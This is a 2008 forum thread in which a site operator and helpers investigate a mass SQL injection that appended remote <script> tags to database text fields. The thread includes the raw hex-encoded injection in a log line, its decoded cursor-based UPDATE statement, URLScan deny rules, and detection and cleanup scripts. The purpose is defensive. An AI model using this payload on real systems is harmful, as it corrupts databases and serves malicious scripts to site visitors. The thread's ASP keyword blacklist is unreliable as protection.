silkyfixer
10 Posts
Re: Anyone know about www.nihaorr1.com/1.js?
Aug 22, 2008 03:38 PM
My problem is that I have various websites that connect to the same database. I need some sort of trigger that catches an update on the database with a <script in it and tells me what site it came from. I have sanitized most of my code as well, but every 2-3 weeks one of my databases still gets infected.
Would you have a trigger script I could install globally on my SQL server?
Thanks
silkyfixer
silkyfixer
10 Posts
Re: Anyone know about www.nihaorr1.com/1.js?
Aug 22, 2008 03:44 PM
I found this for today in my logs. I noticed my database was infected this morning; it happened last night. This is the only DECLARE in my log, and I wonder if they are using something else other than DECLARE.
GET /index.asp ;DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x4445434C415245204054207661726368617228323535292C40432076617263686172283430303029204445434C415245205461626C655F437572736F7220435552534F5220464F522073656C65637420612E6E616D652C622E6E616D652066726F6D207379736F626A6563747320612C737973636F6C756D6E73206220776865726520612E69643D622E696420616E6420612E78747970653D27752720616E642028622E78747970653D3939206F7220622E78747970653D3335206F7220622E78747970653D323331206F7220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20657865632827757064617465205B272B40542B275D20736574205B272B40432B275D3D2727223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777302E646F7568756E716E2E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D27272B5B272B40432B275D20776865726520272B40432B27206E6F74206C696B6520272725223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777302E646F7568756E716E2E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D272727294645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F72%20AS%20CHAR(4000));EXEC(@S); 80 - 65.96.169.213 Mozilla/4.0+(compatible;+MSIE+7.0;+Windows+NT+5.1;+.NET+CLR+1.1.4322;+.NET+CLR+2.0.50727;+.NET+CLR+3.0.04506.648;+.NET+CLR+3.5.21022) - - 200 0 0 34770 1607 9765
steve schofi...
5681 Posts
MVP
Moderator
Re: Anyone know about www.nihaorr1.com/1.js?
Aug 22, 2008 04:14 PM
What is your urlscan.ini set up to look for?
[SQL Injection Raw]
AppliesTo=.asp,.aspx
Steve Schofield
Windows Server MVP - IIS
http://iislogs.com/steveschofield
http://www.IISLogs.com
Log archival solution
Install, Configure, Forget
silkyfixer
10 Posts
Re: Anyone know about www.nihaorr1.com/1.js?
Aug 22, 2008 05:20 PM
[Options]
UseDenyVerbs=1
UseDenyExtensions=1
NormalizeUrlBeforeScan=0
VerifyNormalization=0
AllowHighBitCharacters=1
AllowDotInPath=1
RemoveServerHeader=0
EnableLogging=1
PerProcessLogging=0
AllowLateScanning=0
PerDayLogging=1
UseFastPathReject=0
LogLongUrls=0
UnescapeQueryString=1
RejectResponseUrl=
LoggingDirectory=Logs
AlternateServerName=
RuleList=Edge
[Edge]
AppliesTo=.asp,.aspx,.inc
DenyDataSection=Edge Data
ScanURL=0
ScanAllRaw=0
ScanQueryString=1
ScanHeaders=
[Edge Data]
declare
DECLARE
cursor
CURSOR
[AllowVerbs]
GET
POST
HEAD
[DenyVerbs]
PROPFIND
CONNECT
[DenyExtensions]
.bat
.cmd
[DenyQueryStringSequences]
<
>
If I try to use some of the ones I find on the net, it breaks most of my sites.
Thanks for your time
silkyfixer
silkyfixer
10 Posts
Re: Anyone know about www.nihaorr1.com/1.js?
Aug 22, 2008 05:25 PM
Here is a snippet from the URLScan log. You can see it kicks out the DECLARE, so how did it sneak through? I have about 500 websites that connect to the database, so it's hard to pinpoint where or how it gets through.
[08-22-2008 - 11:41:59] Client at 80.99.117.220: Rule 'Edge' detected string 'declare' in the query string. Request will be rejected. Site Instance='1489121054', Raw URL='/m.asp'
[08-22-2008 - 11:46:44] Client at 189.46.158.208: Rule 'Edge' detected string 'declare' in the query string. Request will be rejected. Site Instance='1489121054', Raw URL='/m-webtv.asp'
[08-22-2008 - 12:05:47] Client at 189.129.167.129: Rule 'Edge' detected string 'declare' in the query string. Request will be rejected. Site Instance='1489121054', Raw URL='/m.asp'
[08-22-2008 - 12:05:48] Client at 189.129.167.129: Rule 'Edge' detected string 'declare' in the query string. Request will be rejected. Site Instance='1489121054', Raw URL='/m.asp'
[08-22-2008 - 12:13:54] Client at 59.29.234.153: Rule 'Edge' detected string 'declare' in the query string. Request will be rejected. Site Instance='1489121054', Raw URL='/m.asp'
[08-22-2008 - 12:20:58] Client at 201.170.148.3: Rule 'Edge' detected string 'declare' in the query string. Request will be rejected. Site Instance='1489121054', Raw URL='/m.asp'
[08-22-2008 - 12:20:59] Client at 201.170.148.3: Rule 'Edge' detected string 'declare' in the query string. Request will be rejected. Site Instance='1489121054', Raw URL='/m.asp'
[08-22-2008 - 12:32:01] Client at 189.24.155.56: Rule 'Edge' detected string 'declare' in the query string. Request will be rejected. Site Instance='1489121054', Raw URL='/m-webtv.asp'
[08-22-2008 - 12:32:01] Client at 189.24.155.56: Rule 'Edge' detected string 'declare' in the query string. Request will be rejected. Site Instance='1489121054', Raw URL='/m.asp'
[08-22-2008 - 12:37:57] Client at 189.149.188.56: Rule 'Edge' detected string 'declare' in the query string. Request will be rejected. Site Instance='1489121054', Raw URL='/m.asp'
[08-22-2008 - 12:37:57] Client at 189.149.188.56: Rule 'Edge' detected string 'declare' in the query string. Request will be rejected. Site Instance='1489121054', Raw URL='/m.asp'
[08-22-2008 - 12:39:22] Client at 201.34.214.205: Rule 'Edge' detected string 'declare' in the query string. Request will be rejected. Site Instance='1489121054', Raw URL='/m.asp'
[08-22-2008 - 12:39:45] Client at 85.99.42.197: Rule 'Edge' detected string 'declare' in the query string. Request will be rejected. Site Instance='1489121054', Raw URL='/m.asp'
[08-22-2008 - 12:43:10] Client at 124.121.28.118: Rule 'Edge' detected string 'declare' in the query string. Request will be rejected. Site Instance='1489121054', Raw URL='/m-webtv.asp'
[08-22-2008 - 12:49:21] Client at 201.211.113.200: Rule 'Edge' detected string 'declare' in the query string. Request will be rejected. Site Instance='1489121054', Raw URL='/y.asp'
[08-22-2008 - 12:58:06] Client at 122.168.200.189: Rule 'Edge' detected string 'declare' in the query string. Request will be rejected. Site Instance='1489121054', Raw URL='/m.asp'
[08-22-2008 - 13:04:54] Client at 190.19.198.60: Rule 'Edge' detected string 'declare' in the query string. Request will be rejected. Site Instance='1489121054', Raw URL='/y.asp'
[08-22-2008 - 13:05:58] Client at 122.163.163.163: Rule 'Edge' detected string 'declare' in the query string. Request will be rejected. Site Instance='1489121054', Raw URL='/m.asp'
[08-22-2008 - 13:08:22] Client at 190.19.198.60: Rule 'Edge' detected string 'declare' in the query string. Request will be rejected. Site Instance='1489121054', Raw URL='/y.asp'
[08-22-2008 - 13:19:44] Client at 195.225.178.21: QueryString contains sequence '%%3C', which is disallowed. Request will be rejected. Site Instance='1643931472', Raw URL='/AddReview.asp', QueryString='txtName=Cialis&txtLocation=PaokyMzP&txtCmnts=Nise+site.%%2C+%%3Ca+href%%3D%%22http%%3A%%2F%%2Fwww.partyvibe.com%%2Fvbulletin%%2Fmember.php%%3Fu%%3D23082%%22%%3ECialis+kaufen%%3C%%2Fa%%3E%%2C++%%25DD%%2C+%%3Ca+href%%3D%%22http%%3A%%2F%%2Fwww.newmediamedicine.com%%2Fforum%%2Fmembers%%2Fsamuelbooker.html%%22%%3EValium+online%%0D%%3C%%2Fa%%3E%%2C++5776%%2C+%%3Ca+href%%3D%%22http%%3A%%2F%%2Fwww.newmediamedicine.com%%2Fforum%%2Fmembers%%2Fclaytonwilliams.html%%22%%3ETramadol%%3C%%2Fa%%3E%%2C++54245%%2C+%%3Ca+href%%3D%%22http%%3A%%2F%%2Fvbulletin.thesite.org%%2Fmember.php%%3Fu%%3D31710%%22%%3Eviagra%%3C%%2Fa%%3E%%2C++renuiq%%2C+%%3Ca+href%%3D%%22http%%3A%%2F%%2Fwww.newmediamedicine.com%%2Fforum%%2Fmembers%%2Fkeithbreunig.html%%22%%3EAmbien%%3C%%2Fa%%3E%%2C++nvnti%%2C+%%3Ca+href%%3D%%22http%%3A%%2F%%2Fboard.muse.mu%%2Fmember.php%%3Fu%%3D98088%%22%%3EBuy+Tramadol+online%%0D%%3C%%2Fa%%3E%%2C++tbsvm%%2C+%%3Ca+href%%3D%%22http%%3A%%2F%%2Fwww.newmediamedicine.com%%2Fforum%%2Fmembers%%2Fsamuelbooker.html%%22%%3EDiazepam%%3C%%2Fa%%3E%%2C++ivbp%%2C+%%3Ca+href%%3D%%22http%%3A%%2F%%2Fcommunity.fotopic.net%%2Fuser%%2Fyyogml.html%%22%%3ECheap+Valium%%3C%%2Fa%%3E%%2C++1672%%2C+&escid=1010'
steve schofi...
5681 Posts
MVP
Moderator
Re: Anyone know about www.nihaorr1.com/1.js?
Aug 22, 2008 08:22 PM
If you are running the RTW version of URLScan 3, the logs are W3C compliant and you can use Log Parser against them. Also, the logs you posted have the SITEID property; that would help narrow down which requests are being blocked.
You could select the s-siteid property, sort it by ID ascending, then compare. That is one way off-hand if you have a lot of sites hitting the DB.
http://blogs.iis.net/nazim/archive/2008/08/19/urlscan-v3-0-rtw-released.aspx
Another way would be to create a log parser script that goes through your w3svc files and pipes the data to an external file. When hunting and pecking like this, copying the affected files to a separate location and hitting with log parser is effective. You could have a recursive script copy the log to a single location then hit with log parser. Hope that helps.
silkyfixer
10 Posts
Re: Anyone know about www.nihaorr1.com/1.js?
Aug 22, 2008 10:22 PM
When this first happened to me last year, before the massive web attack, I copied all the log files to my Unix box and used grep to parse through the files. It took me a while to pinpoint the injection since it was not in the wild at the time. I had a coder write a decrypt script to decode the hex:
#!/usr/bin/perl
use strict;
use warnings;

# Hex-encoded payload copied out of the log (the argument to CAST(0x... )).
my $s=<<"EOF";
4445434C415245204054205641524348415228323535292C404320564152434841522832353529204445434C415245205461626C655F437572736F72204355
52534F5220464F522053454C45435420612E6E616D652C622E6E616D652046524F4D207379736F626A6563747320612C737973636F6C756D6E732062205748
45524520612E69643D622E696420414E4420612E78747970653D27752720414E442028622E78747970653D3939204F5220622E78747970653D3335204F5220
622E78747970653D323331204F5220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D2054
61626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E2045584543282755504441
5445205B272B40542B275D20534554205B272B40432B275D3D525452494D28434F4E5645525428564152434841522838303030292C5B272B40432B275D2929
2B27273C736372697074207372633D687474703A2F2F7777772E62616E6E657238322E636F6D2F622E6A733E3C2F7363726970743E27272729204645544348
204E4558542046524F4D205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C
4F43415445205461626C655F437572736F72
EOF
# The heredoc keeps its line breaks. Strip all whitespace first, otherwise a
# newline gets paired with a hex digit and every byte after it is misaligned.
$s =~ s/\s+//g;
# Two hex digits -> one byte, printed as-is.
while (length($s)>0) {
my $hex=substr($s,0,2); $s=substr($s,2,length($s));
my $ch=hex($hex); $ch=pack("C",$ch);
print $ch;
}
print "\n";
Now decoded, you notice that it's what was in the wild:
DECLARE @T VARCHAR(255),@C VARCHAR(255) DECLARE Table_Cursor CURSOR FOR SELECT a.name,b.name FROM sysobjects a,syscolumns b WHERE a.id=b.id AND a.xtype='u' AND (b.xtype=99 OR b.xtype=35 OR b.xtype=231 OR b.xtype=167) OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN EXEC('UPDATE ['+@T+'] SET ['+@C+']=RTRIM(CONVERT(VARCHAR(8000),['+@C+']))+''<script src=http://www.banner82.com/b.js></script>''') FETCH NEXT FROM Table_Cursor INTO @T,@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor
The question is: have they found a new way to inject without the DECLARE, or a way around dequoting the injection? I have a feeling it's a new type of attack and they don't use a DECLARE.
I will sift through the logs and see what I can find, but it's hard when you have hundreds of sites and log files.
It would be great if someone could write a trigger for MSSQL so that any time an update contains %<script etc. it will tell me what site it came from. This would help out greatly, as I can then pinpoint where it came from. Maybe mssql-scan :)
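Steve's Log Parser suggestion and the Perl decoder above can be combined into one check over the IIS W3SVC logs: group requests that carry a CAST(0x...) payload by s-sitename and decode the hex to see what each one does. The script below is an added example, not code from the thread; the log lines it runs on are constructed to match the format of the GET line posted earlier (the #Fields: header, timestamps and the site instance ids from the URLScan log are all made up or reused for the sample).

```python
"""Scan IIS W3C log lines for hex-encoded SQL injection payloads, per site."""
import re
from collections import defaultdict
from urllib.parse import unquote_plus

# Constructed sample: the decoded statement from the thread, re-encoded the way
# the attacker sends it (CAST(0x... AS CHAR(4000))), so the scanner has a
# realistic payload to decode. Everything up to HEX_RE is made up for the demo.
INJECTED_SQL = (
    "DECLARE @T VARCHAR(255),@C VARCHAR(255) DECLARE Table_Cursor CURSOR FOR "
    "SELECT a.name,b.name FROM sysobjects a,syscolumns b WHERE a.id=b.id AND "
    "a.xtype='u' AND (b.xtype=99 OR b.xtype=35 OR b.xtype=231 OR b.xtype=167) "
    "OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C "
    "WHILE(@@FETCH_STATUS=0) BEGIN EXEC('UPDATE ['+@T+'] SET ['+@C+']="
    "RTRIM(CONVERT(VARCHAR(8000),['+@C+']))"
    "+''<script src=http://www.banner82.com/b.js></script>''') "
    "FETCH NEXT FROM Table_Cursor INTO @T,@C END "
    "CLOSE Table_Cursor DEALLOCATE Table_Cursor"
)
ATTACK_QUERY = ("id=12;DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x"
                + INJECTED_SQL.encode("ascii").hex().upper()
                + "%20AS%20CHAR(4000));EXEC(@S);")
SAMPLE_LOG = [
    "#Software: Microsoft Internet Information Services 6.0",
    "#Fields: date time s-sitename cs-method cs-uri-stem cs-uri-query c-ip sc-status",
    "2008-08-22 03:12:07 W3SVC1489121054 GET /index.asp " + ATTACK_QUERY
    + " 65.96.169.213 200",
    "2008-08-22 03:12:09 W3SVC1489121054 GET /m.asp id=7 80.99.117.220 200",
    "2008-08-22 03:13:40 W3SVC1643931472 GET /AddReview.asp " + ATTACK_QUERY
    + " 195.225.178.21 500",
]

HEX_RE = re.compile(r"CAST\s*\(\s*0x([0-9A-Fa-f]+)", re.IGNORECASE)
SCRIPT_RE = re.compile(r"<script[^>]*src=[\"']?([^\"'\s>]+)", re.IGNORECASE)


def decode_hex_payload(hexstr):
    """Two hex digits -> one byte, the same operation as the thread's Perl
    decoder, but whitespace is stripped first so a wrapped blob still decodes."""
    clean = re.sub(r"\s+", "", hexstr)
    if len(clean) % 2:
        clean = clean[:-1]          # ignore a dangling nibble instead of failing
    return bytes.fromhex(clean).decode("latin-1")


def parse_w3c(lines):
    """Yield one dict per record, using the #Fields: header for column names
    (what Log Parser does), and skip lines that do not fit that header."""
    fields = None
    for line in lines:
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
            continue
        if fields is None or not line.strip() or line.startswith("#"):
            continue
        values = line.split(" ")
        if len(values) == len(fields):
            yield dict(zip(fields, values))


def find_injections(lines):
    """Return {s-sitename: [finding, ...]} for requests carrying CAST(0x...).
    An sc-status of 200 means the page processed the request instead of
    rejecting it, so that site is the likely entry point."""
    findings = defaultdict(list)
    for rec in parse_w3c(lines):
        query = unquote_plus(rec.get("cs-uri-query", ""))
        for m in HEX_RE.finditer(query):
            sql = decode_hex_payload(m.group(1))
            src = SCRIPT_RE.search(sql)
            findings[rec["s-sitename"]].append({
                "uri": rec.get("cs-uri-stem"),
                "client": rec.get("c-ip"),
                "status": rec.get("sc-status"),
                "script_src": src.group(1) if src else None,
                "sql_preview": sql[:60],
            })
    return dict(findings)


if __name__ == "__main__":
    for site, hits in find_injections(SAMPLE_LOG).items():
        for h in hits:
            print(site, h["uri"], h["client"], h["status"], h["script_src"])
```

Run it over every site's W3SVC folder and the sites whose hits come back with status 200 are the ones whose pages accepted the statement.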
silkyfixer
10 Posts
Re: Anyone know about www.nihaorr1.com/1.js?
Aug 26, 2008 02:38 AM
OK, I have no idea, but somehow URLScan is not working. I put in the statements of your config and it still got infected today. There must be some way around the DECLARE statement.
Is there any way to create a trigger on the MSSQL database to tell me from what site the update injects the script code? Since I never insert or update any of my tables with <script in them, I think this will pinpoint where the attack is coming from.
My URLScan shows it blocking DECLARE and other random injections, but it still gets infected. So I would assume they are no longer using a DECLARE statement, or have a way around the DECLARE statement.
Again, over 500 sites connect to the same database, so I have no idea how or where the injection comes from.
I am not a coder, so I would not know where or how to write a trigger to store in a log file where the injection came from.
Thank you
silkyfixer
silkyfixer
10 Posts
Re: Anyone know about www.nihaorr1.com/1.js?
Aug 26, 2008 04:21 AM
Problem is that I can dump all the logs and parse through them, but I don't know what to look for. Since URLScan kicks out the DECLARE, it must be something else.
silkyfixer
Paul Bishop
3 Posts
Re: Anyone know about www.nihaorr1.com/1.js?
Dec 13, 2008 01:14 AM
This is an SQL injection attack. You must remove the <script ..... to ...</script>.
It copies itself to the end of any text column it can.
In ASP:
<%
' Escape single quotes so they cannot terminate a string literal in the SQL.
function stripQuotes(strWords)
    stripQuotes = replace(strWords, "'", "''")
end function

' Strip SQL keywords from the input. This is a blacklist: it also mangles
' legitimate text (any word ending in "or ") and misses what it does not list.
function killChars(strWords)
    dim badChars
    dim newChars
    dim i
    badChars = array("select ", "drop ", ";", "--", "insert ", "delete ", "xp_", " or ", "or ")
    newChars = strWords
    for i = 0 to uBound(badChars)
        ' vbTextCompare makes the match case-insensitive; the default binary
        ' compare would let "SELECT " or "Drop " straight through.
        newChars = replace(newChars, badChars(i), "", 1, -1, vbTextCompare)
    next
    killChars = newChars
end function

bco = stripQuotes(killChars(replace(request("bco"), "'", "")))
%>
You must use this on all requested data.
You must even use it on things like request server variables, because the 1.js file link can be attached to OS or REF server vars.
Do it on the backend as well, or on a textbox, checkbox or radio: if you're requesting it, it can be attached. No need to worry about session objects unless you request an element and assign it to a session object. Integers are not affected.
This is a sample script of how to remove it from the DB.
os is the text column:
<% response.Buffer=False %>
<%
Server.ScriptTimeout = 50000
dim pida(4500000)
dim descr(4500000)
dim ldescr(4500000)
dim i, p, descrx, SQLStmt, RS
i = 0
' dbSubs is assumed to be an already-open ADODB.Connection to the database.
SQLStmt = "SELECT osid, os From OS "
Set RS = dbSubs.Execute(SQLStmt)
' The post used a helper checkrs(rs) here; Not rs.EOF is the standard ADO test.
do while Not rs.EOF
    if len(rs("os")) > 0 then
        pida(i) = rs("osid")
        ' Remove the injected tag, then drop single quotes so the value cannot
        ' break the concatenated UPDATE below (a parameterised ADODB.Command
        ' would avoid losing legitimate apostrophes).
        descrx = replace(rs("os"), "<script src=http://17gamo.com/1.js></script>", "")
        descr(i) = replace(descrx, "'", "")
        i = i + 1
    end if
    rs.movenext
loop
for p = 0 to (i - 1)
    response.Write pida(p) & " " & descr(p) & "<br>"
    SQLStmt = "UPDATE OS SET os = '" & descr(p) & "' WHERE osid= '" & pida(p) & "' ; "
    Set RS = dbSubs.Execute(SQLStmt)
next
%>
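As an added example (not Paul's code), here is the same cleanup generalised in Python. It handles both payload shapes that appear in this thread, the tag appended to the column (the banner82.com statement) and the "></title>...<!-- wrapper that the hex-encoded payload in the GET line prepends, including several stacked copies, and it binds values with placeholders instead of concatenating them into the UPDATE. An in-memory sqlite3 table OS(osid, os) with constructed rows stands in for the SQL Server table so it runs offline; against SQL Server the same statements would go through pyodbc with the same ? placeholders.

```python
"""Find and remove injected <script> tags from a text column."""
import re
import sqlite3

# Both shapes seen in the thread: the tag appended to the column
# (banner82.com) and the '"></title>...<!--' wrapper prepended to it
# (the douhunqn.cn payload). Repeated runs of the attack stack several copies.
INJECTED_RE = re.compile(
    r'(?:"></title>)?'                             # prefix of the prepended form
    r'<script[^>]*\bsrc=["\']?([^"\'\s>]+)[^>]*>'  # src= of the loaded .js
    r'\s*</script>'
    r'(?:<!--)?',                                  # comment opener that hides the rest
    re.IGNORECASE,
)


def strip_injected_scripts(value):
    """Return (cleaned_text, [script urls removed]); value is unchanged if clean."""
    if value is None:
        return None, []
    found = [m.group(1) for m in INJECTED_RE.finditer(value)]
    return INJECTED_RE.sub("", value), found


def clean_column(conn, table, key_col, text_col):
    """Repair every infected row of table.text_col; returns {key: [urls]}.
    Identifiers cannot be bound as parameters, so they are validated against a
    strict pattern; the values are always bound with ?, never concatenated."""
    ident = re.compile(r"^[A-Za-z_][A-Za-z0-9_]*$")
    for name in (table, key_col, text_col):
        if not ident.match(name):
            raise ValueError("unsafe identifier: %r" % name)
    repaired = {}
    cur = conn.cursor()
    rows = cur.execute(
        "SELECT %s, %s FROM %s WHERE %s LIKE ?" % (key_col, text_col, table, text_col),
        ("%<script%",),
    ).fetchall()
    for key, text in rows:
        cleaned, urls = strip_injected_scripts(text)
        if urls:
            cur.execute("UPDATE %s SET %s = ? WHERE %s = ?" % (table, text_col, key_col),
                        (cleaned, key))
            repaired[key] = urls
    conn.commit()
    return repaired


def demo_table():
    """Constructed sample rows mirroring the thread's OS table (osid, os)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE OS (osid INTEGER PRIMARY KEY, os TEXT)")
    conn.executemany("INSERT INTO OS VALUES (?, ?)", [
        (1, "Windows XP"),
        (2, "Linux<script src=http://www.banner82.com/b.js></script>"),
        (3, "Mac OS<script src=http://www.banner82.com/b.js></script>"
            "<script src=http://www.banner82.com/b.js></script>"),
        (4, '"></title><script src="http://www0.douhunqn.cn/csrss/w.js"></script><!--Solaris'),
        (5, "It's a <b>bold</b> name"),   # legitimate markup and quote must survive
    ])
    return conn


if __name__ == "__main__":
    db = demo_table()
    for key, urls in clean_column(db, "OS", "osid", "os").items():
        print(key, urls)
```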